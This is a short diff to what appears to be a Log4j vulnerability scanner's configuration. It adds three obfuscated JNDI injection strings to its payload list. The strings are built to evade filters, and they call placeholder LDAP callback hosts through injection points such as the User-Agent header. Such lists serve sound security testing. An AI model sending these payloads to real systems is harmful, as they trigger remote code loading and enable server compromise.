--- a/config.cfg
+++ b/config.cfg
@@ -16,6 +16,9 @@ INJ_STRING:{${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://<I
 INJ_STRING:{${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}d${lower:a}}p://<IP>:<PORT>/<RND>}
 INJ_STRING:{jndi:dns://<IP>:<PORT>}
 INJ_STRING:${jndi:ldap://<IP>:<PORT>/<RND>}
+INJ_STRING:${jnd${123%25ff:-${123%25ff:-i:}}ldap://<IP>:<PORT>/<RND>}
+INJ_STRING:${j${k8s:k5:-ND}${sd:k5:-${123%25ff:-${123%25ff:-${upper:ı}:}}}ldap://<IP>:<PORT>/<RND>}
+INJ_STRING:${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://<IP>:<PORT>/<RND>}
 
 # injection points
 INJ_POINT:HEADER:User-Agent
